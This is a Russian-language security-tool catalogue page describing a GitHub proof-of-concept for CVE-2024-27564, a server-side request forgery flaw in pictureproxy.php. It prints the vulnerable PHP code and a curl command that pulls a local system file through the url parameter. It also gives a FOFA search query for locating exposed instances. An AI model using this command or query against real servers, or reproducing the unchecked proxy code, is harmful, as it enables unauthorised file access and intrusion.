Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SSRF-Exploit-CVE-2024-27564 — Доказательство концепции эксплуатации для CVE-2024-27564, демонстрирующее SSRF через непроверенный параметр URL в pictureproxy.php. Включает тестирование на основе curl и поиск уязвимых экземпляров с помощью FOFA. | Kitploit
Инструменты/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

Доказательство концепции эксплуатации для CVE-2024-27564, демонстрирующее SSRF через непроверенный параметр URL в pictureproxy.php. Включает тестирование на основе curl и поиск уязвимых экземпляров с помощью FOFA.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1451 год назадЕщё не проверено

SSRF-Exploit-CVE-2024-27564

Название проекта

Этот проект демонстрирует уязвимость Server-Side Request Forgery (SSRF) в файле pictureproxy.php.

Описание

Уязвимость в pictureproxy.php позволяет удаленным злоумышленникам выполнять произвольные запросы, внедряя URL-адреса в параметр url. Эта уязвимость SSRF может быть использована без аутентификации, что делает её особенно опасной.

Уязвимый код находится в файле pictureproxy.php. Проблема возникает из-за того, что функция не проверяет должным образом параметр url. Переменная $_GET['url'] передается в функцию file_get_contents(), которая получает содержимое по указанному URL. Это может привести к SSRF.

Подтверждение концепции

Вот простая демонстрация концепции, показывающая, как можно эксплуатировать уязвимость:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Чтобы протестировать уязвимость, можно использовать следующую команду curl:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Протестировано с Open Redirect

Тест с использованием уязвимости открытого редиректа:

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

Banner

Инструменты

  • FOFA: поисковая система для интернет-устройств и уязвимостей. Используйте следующую команду для поиска релевантных результатов:
root@kitploit:~
"title="ChatGPT个人专用版""

Заключение

Этот проект подчеркивает важность правильной проверки пользовательских вводов для предотвращения уязвимостей SSRF. Всегда проверяйте такие параметры, как URL-адреса, перед их обработкой.

Скачать инструмент